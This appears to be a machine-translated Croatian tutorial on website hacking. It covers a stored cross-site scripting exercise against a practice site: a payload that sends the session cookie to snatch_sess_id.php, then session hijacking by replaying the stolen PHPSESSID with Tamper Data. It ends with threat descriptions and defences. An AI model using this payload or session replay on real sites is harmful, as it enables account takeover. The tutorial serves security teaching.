Kako hakirati web stranicu? Tehnike hakiranja web stranice

โšก Pametni saลพetak

Hakiranje web stranica iskoriลกtava slabosti u web aplikacijama - loลกe napisan kod, neprovjeren unos i slabo rukovanje sesijama - kako bi se dobio neovlaลกteni pristup. Ova stranica prikazuje uobiฤajene tehnike napada i, ลกto je joลก vaลพnije, protumjere koje odrลพavaju web stranicu sigurnom.

  • ๐ŸŒ Target: Web aplikacije prihvaฤ‡aju korisniฤki unos putem interneta, izlaลพuฤ‡i svako nevalidirano polje napadu.
  • ???? Tehnike: SQL injekcija, cross-site scripting, trovanje sesija, manipuliranje obrascima i injekcija koda su na vrhu popisa.
  • ๐Ÿช Otmica sesije: Ukradeni ID sesije omoguฤ‡uje napadaฤu da se laลพno predstavlja kao prijavljeni korisnik bez lozinke.
  • ๐Ÿ›ก๏ธ obrana: Validacija unosa, parametrizirani upiti i ลกifrirani kolaฤiฤ‡i sesije zatvaraju uobiฤajene praznine.
  • ๐ŸŽฏ Standard: OWASP Top 10 definira web ranjivosti koje bi svaki programer trebao testirati.
  • ๐Ÿค– Moderni rub: Vatrozidi pokretani umjetnom inteligencijom uฤe normalan promet i oznaฤavaju pokuลกaje ubrizgavanja u stvarnom vremenu.

Kako hakirati web stranicu

Viลกe ljudi ima pristup internetu nego ikad prije. To je potaknulo mnoge organizacije da razviju web aplikacije koje korisnici mogu koristiti online za interakciju s organizacijom. Loลกe napisan kod za web aplikacije moลพe se iskoristiti za dobivanje neovlaลกtenog pristupa osjetljivim podacima i web posluลพiteljima.

Nauฤit ฤ‡ete uobiฤajene tehnike hakiranja web stranica i protumjere koje ลกtite od takvih napada.

Kako hakirati web stranicu

U ovom praktiฤnom scenariju hakiranja web stranice, otet ฤ‡emo korisniฤku sesiju web aplikacije koja se nalazi na www.techpanda.orgKoristit ฤ‡emo cross-site scripting za ฤitanje ID-a sesije kolaฤiฤ‡a, a zatim ga upotrijebiti za oponaลกanje legitimne korisniฤke sesije.

Pretpostavka je da napadaฤ ima pristup web aplikaciji i ลพeli oteti sesije drugih korisnika koji koriste istu aplikaciju. Cilj ovog napada mogao bi biti dobivanje administratorskog pristupa web aplikaciji, pod pretpostavkom da je napadaฤev pristupni raฤun ograniฤen.

Korak 1) Otvorite URL http://www.techpanda.org/.

Za praktiฤne svrhe, toplo se preporuฤuje pristup pomoฤ‡u SQL injekcije. Pogledajte ovaj ฤlanak o SQL injekciji za viลกe informacija o tome kako to uฤiniti.

Korak 2) Unesite podatke za prijavu.

E-poลกta za prijavu je admin@google.com, a lozinka je Password2010.

Korak 3) Provjerite nadzornu ploฤu.

Ako ste se uspjeลกno prijavili, dobit ฤ‡ete sljedeฤ‡u nadzornu ploฤu.

Nadzorna ploฤa Techpande prikazana nakon uspjeลกne prijave

Korak 4) Unesite novi sadrลพaj.

Kliknite na Dodaj novi kontakt i unesite sljedeฤ‡e kao ime:

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Korak 5) Dodajte JavaSkripta.

Gornji kod koristi JavaSkripta. Dodaje hipervezu s dogaฤ‘ajem onclick. Kada niลกta ne sluteฤ‡i korisnik klikne na vezu, dogaฤ‘aj dohvaฤ‡a ID sesije PHP kolaฤiฤ‡a i ลกalje ga na stranicu snatch_sess_id.php zajedno s ID-om sesije u URL.

Dodajte novi kontaktni obrazac sa zlonamjernim skriptom unesenim u polje za ime

Korak 6) Dodajte detalje.

Unesite preostale podatke kao ลกto je prikazano dolje i kliknite Spremi promjene.

Ispunjeni kontaktni obrazac spreman za spremanje u bazu podataka

Korak 7) Provjerite nadzornu ploฤu.

Vaลกa nadzorna ploฤa sada ฤ‡e izgledati kao na sljedeฤ‡em zaslonu.

Nadzorna ploฤa kontakata koja prikazuje pohranjeni unos s tamnom hipervezom

Korak 8) Provjerite ID sesije.

Buduฤ‡i da je cross-site skripta pohranjena u bazi podataka, ona se uฤitava svaki put kada se korisnici s pravima pristupa prijave. Kada se administrator prijavi i klikne na hipervezu s natpisom Dark, prikazuje se prozor s ID-om sesije prikazanim u URL.

Prozor preglednika koji prikazuje snimljeni ID sesije proslijeฤ‘en u URL

Napomena: skripta bi mogla poslati vrijednost udaljenom posluลพitelju na kojem je pohranjen PHPSESSID, a zatim preusmjeriti korisnika natrag kao da se niลกta nije dogodilo.

Napomena: vrijednost koju dobijete moลพe se razlikovati od one prikazane ovdje, ali koncept je isti.

Upotreba oponaลกanja sesije Firefox i Tamper Data dodatak

Napomena: klasiฤni dodatak Tamper Data prikazan u nastavku viลกe se ne instalira na trenutni Firefox, ali koncept koji ilustrira - presretanje i mijenjanje HTTP zahtjeva za ponovno reproduciranje snimljene sesije - ostaje nepromijenjen.

Dijagram toka u nastavku prikazuje korake koje morate poduzeti da biste dovrลกili ovu vjeลพbu.

Dijagram toka koraka vjeลพbe oponaลกanja sesije

  • Trebat ฤ‡e vam Firefox web preglednik za ovaj odjeljak i dodatak Tamper Data.
  • Otvoren Firefox i instalirajte dodatak kao ลกto je prikazano na dijagramima ispod.

Firefox upravitelj dodataka koji se koristi za traลพenje dodatka Tamper Data

Podaci o neovlaลกtenom mijenjanju navedeni su u Firefox rezultati pretraลพivanja dodataka

  • Potraลพite podatke o neovlaลกtenom pristupu, a zatim kliknite na instalaciju kao ลกto je prikazano gore.

Dijalog za dopuลกtenja za dodatak s gumbom Prihvati i instaliraj

  • Kliknite na Prihvati i instalirajโ€ฆ

Firefox upit za ponovno pokretanje preglednika nakon instaliranja dodatka

Firefox traka izbornika omoguฤ‡ena je tako da je izbornik Alati vidljiv

  • Kliknite na Ponovno pokreni sada kada instalacija zavrลกi.
  • Omoguฤ‡ite traku izbornika Firefox ako nije prikazano.

Izbornik Alati otvoren je s odabranim Podaci o neovlaลกtenom mijenjanju

  • Kliknite na izbornik Alati, a zatim odaberite Podaci o neovlaลกtenom mijenjanju kao ลกto je prikazano dolje.

Ispraznite prozor s podacima o neovlaลกtenom pristupu prije snimanja zahtjeva

  • Dobit ฤ‡ete sljedeฤ‡i prozor. Napomena: Ako prozor nije prazan, pritisnite gumb za brisanje.

Skoฤni prozor s upitom za izmjenu podataka o neovlaลกtenoj izmjeni odlaznog zahtjeva

  • Kliknite na izbornik Pokreni neovlaลกteno mijenjanje.
  • Prebacite se natrag na Firefox U web preglednik upiลกite http://www.techpanda.org/dashboard.php, a zatim pritisnite tipku Enter za uฤitavanje stranice.
  • Dobit ฤ‡ete sljedeฤ‡i skoฤni prozor od Tamper Data.

Skoฤni prozor za neovlaลกteno mijenjanje s opcijama za neovlaลกteno mijenjanje, slanje i prekid

  • Skoฤni prozor ima tri (3) opcije. Opcija Izmjena omoguฤ‡uje vam izmjenu podataka HTTP zaglavlja prije nego ลกto se poลกalju posluลพitelju.
  • Kliknite na nju.
  • Dobit ฤ‡ete sljedeฤ‡i prozor.

Zahtjev za ureฤ‘ivaฤ zaglavlja gdje se vrijednost kolaฤiฤ‡a moลพe zamijeniti

  • Kopirajte ID PHP sesije koji ste kopirali iz napada URL i zalijepite ga nakon znaka jednakosti. Vaลกa vrijednost bi sada trebala izgledati ovako.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
  • Kliknite na gumb OK.
  • Ponovno ฤ‡ete dobiti skoฤni prozor s podacima o neovlaลกtenom mijenjanju.

Ponovno se pojavljuje skoฤni prozor s podacima o neovlaลกtenom mijenjanju i potvrdni okvir Nastavi neovlaลกteno mijenjanje

  • Poniลกtite potvrdni okvir koji pita Continue Tampering?
  • Kliknite na gumb za slanje kada zavrลกite.
  • Trebali biste moฤ‡i vidjeti nadzornu ploฤu kao ลกto je prikazano dolje.

Do nadzorne ploฤe Techpande doลกlo se ponovnim reprodukcijom snimljene sesije

Napomena: nismo se prijavili; oponaลกali smo sesiju prijave koristeฤ‡i PHPSESSID vrijednost koju smo preuzeli koriลกtenjem cross-site scriptinga.

ล to je web aplikacija? ล to su web prijetnje?

Web aplikacija (poznata i kao web stranica) je aplikacija temeljena na klijent-posluลพitelj modelu. Posluลพitelj omoguฤ‡uje pristup bazi podataka i poslovnu logiku. Nalazi se na web posluลพitelju. Klijentska aplikacija radi na klijentskom web pregledniku. Web aplikacije su obiฤno napisane u jezicima kao ลกto su Java, C#, VB.Net, PHPi ColdFusion Markup Language, itd. Baze podataka koje se koriste u web aplikacijama ukljuฤuju MySQL, MS SQL Server, PostgreSQL, SQLite, Itd

Vrhunske tehnike hakiranja web stranica

Veฤ‡ina web aplikacija nalazi se na javnim posluลพitelji dostupni putem interneta. To ih ฤini ranjivima na napade zbog lake dostupnosti. Slijede uobiฤajene prijetnje web aplikacijama.

  • SQL Injection โ€“ cilj ove prijetnje mogao bi biti zaobilaลพenje algoritama za prijavu, sabotiranje podataka itd.
  • Denial of Service Napadi โ€“ cilj ove prijetnje mogao bi biti uskratiti legitimnim korisnicima pristup resursu.
  • Skripta na viลกe stranica (XSS) โ€“ cilj ove prijetnje mogao bi biti ubrizgavanje koda koji se moลพe izvrลกiti u pregledniku na strani klijenta.
  • Trovanje kolaฤiฤ‡ima/sesijom โ€“ cilj ove prijetnje je izmijeniti kolaฤiฤ‡e/podatke o sesiji od strane napadaฤa kako bi dobio neovlaลกteni pristup.
  • Neovlaลกteno mijenjanje obrasca โ€“ cilj ove prijetnje je modificiranje podataka obrazaca kao ลกto su cijene u aplikacijama za e-trgovinu kako bi napadaฤ mogao dobiti artikle po sniลพenim cijenama.
  • Code Ubrizgavanje โ€“ cilj ove prijetnje je ubacivanje koda kao ลกto je PHP, Python, itd. koji se mogu izvrลกiti na posluลพitelju. Kod moลพe instalirati straลพnja vrata, otkriti osjetljive informacije itd.
  • Oskvrnjivanje โ€“ cilj ove prijetnje je izmijeniti stranicu koja se prikazuje na web mjestu i preusmjeriti sve zahtjeve za stranicu na jednu stranicu koja sadrลพi poruku napadaฤa.

Kako zaลกtititi svoju web stranicu od hakova?

Organizacija moลพe usvojiti sljedeฤ‡u politiku kako bi se zaลกtitila od napada web posluลพitelja.

  • SQL Injection โ€“ ฤiลกฤ‡enje i validacija korisniฤkih parametara prije slanja u bazu podataka na obradu moลพe pomoฤ‡i u smanjenju vjerojatnosti napada putem SQL injekcije. Mehanizmi baza podataka kao ลกto je MS SQL Server, MySQLitd. podrลพavaju parametre i pripremljene naredbe. Mnogo su sigurniji od tradicionalnih SQL naredbi.
  • Odbijanje napada usluga โ€“ Vatrozidi se mogu koristiti za odbacivanje prometa sa sumnjivih IP adresa ako je napad jednostavan DoS. Pravilna konfiguracija mreลพa i sustav za otkrivanje upada takoฤ‘er mogu pomoฤ‡i u smanjenju vjerojatnosti uspjeha DoS napada.
  • Skriptiranje na viลกe mjesta โ€“ validiranje i ฤiลกฤ‡enje zaglavlja, parametara proslijeฤ‘enih putem URL, parametri obrasca i skrivene vrijednosti mogu pomoฤ‡i u smanjenju XSS napada.
  • Trovanje kolaฤiฤ‡ima/sesijom โ€“ to se moลพe sprijeฤiti ลกifriranjem sadrลพaja kolaฤiฤ‡a, vremenskim ograniฤenjem kolaฤiฤ‡a nakon nekog vremena i povezivanjem kolaฤiฤ‡a s IP adresom klijenta koja je koriลกtena za njihovo stvaranje.
  • Neovlaลกteno mijenjanje obrasca โ€“ to se moลพe sprijeฤiti validacijom i provjerom korisniฤkog unosa prije njegove obrade.
  • Code Ubrizgavanje โ€“ to se moลพe sprijeฤiti tretiranjem svih parametara kao podataka, a ne kao izvrลกnog koda. Za implementaciju ovoga mogu se koristiti sanitizacija i validacija.
  • Oskvrnjivanje โ€“ dobar sigurnost web aplikacije Pravila bi trebala osigurati da se zapeฤate ฤesto koriลกtene ranjivosti za pristup web posluลพitelju. To moลพe biti pravilna konfiguracija operativnog sustava, softvera web posluลพitelja i najboljih sigurnosnih praksi prilikom razvoja.ping web aplikacije.

Provjeri ovo: 9 najbolji URL Skeneri za provjeru je li poveznica sigurna od zlonamjernog softvera

Pitanja i odgovori

Samo uz pismeno dopuลกtenje vlasnika. Testiranje web-mjesta koje ne posjedujete ili za koje nemate ovlaลกtenje za procjenu je ilegalno prema zakonima poput ameriฤkog Zakona o raฤunalnim prijevarama i zlouporabi. Opsezi nagrade za pogreลกke definiraju ลกto je dopuลกteno.

Pripazite na oลกteฤ‡ene stranice, neoฤekivane nove administratorske korisnike, nepoznate datoteke ili skripte, preusmjeravanja na neลพeljene web-lokacije i skokove prometa. Praฤ‡enje integriteta datoteka, pregled zapisnika posluลพitelja i skener zlonamjernog softvera rano otkrivaju veฤ‡inu kompromitiranih sadrลพaja.

OWASP Top 10 je popis najkritiฤnijih sigurnosnih rizika web aplikacija koji odrลพava zajednica. U izdanju za 2025. godinu na prvo mjesto stavlja Prekinutu kontrolu pristupa, a slijede je pogreลกna konfiguracija sigurnosti i kvarovi u lancu opskrbe softverom.

WAF pregledava dolazni HTTP promet i blokira poznate obrasce napada poput SQL injekcije i cross-site scriptinga prije nego ลกto doฤ‘u do aplikacije. Nudi virtualno krpanje, ali ne zamjenjuje sigurni kod.

Vatrozidi pokretani umjetnom inteligencijom uฤe normalan promet web-mjesta, a zatim u stvarnom vremenu oznaฤavaju anomalije poput pokuลกaja ubrizgavanja, pretrpavanja vjerodajnica i zlouporabe botova. Modeli strojnog uฤenja hvataju zero-day obrasce koje statiฤka pravila propuลกtaju, s manje laลพno pozitivnih rezultata.

AI asistenti poput GitHub kopilot ubrzavaju pisanje validacije ulaza i parametriziranih upita, ali mogu i predloลพiti nesigurne obrasce. Tretirajte svaki prijedlog kao nacrt i neka ga pregleda ฤovjek prije implementacije.

Popularne opcije ukljuฤuju CEH, OSCP i CompTIA Security+, dok CISSP ลกiroko pokriva sigurnosnu arhitekturu. Oni potvrฤ‘uju procjenu ranjivosti, sigurnu konfiguraciju i obrambene vjeลกtine koje poslodavci oฤekuju za uloge u web sigurnosti.

Skeniranje ranjivosti je automatizirano i brzo navodi poznate slabosti bez njihovog iskoriลกtavanja. Testiranje prodiranja je uglavnom ruฤni angaลพman gdje testeri aktivno iskoriลกtavaju nedostatke kako bi pokazali stvarni utjecaj. Skeniranje nudi ลกirinu; testiranje olovkom nudi dubinu.

Saลพmite ovu objavu uz: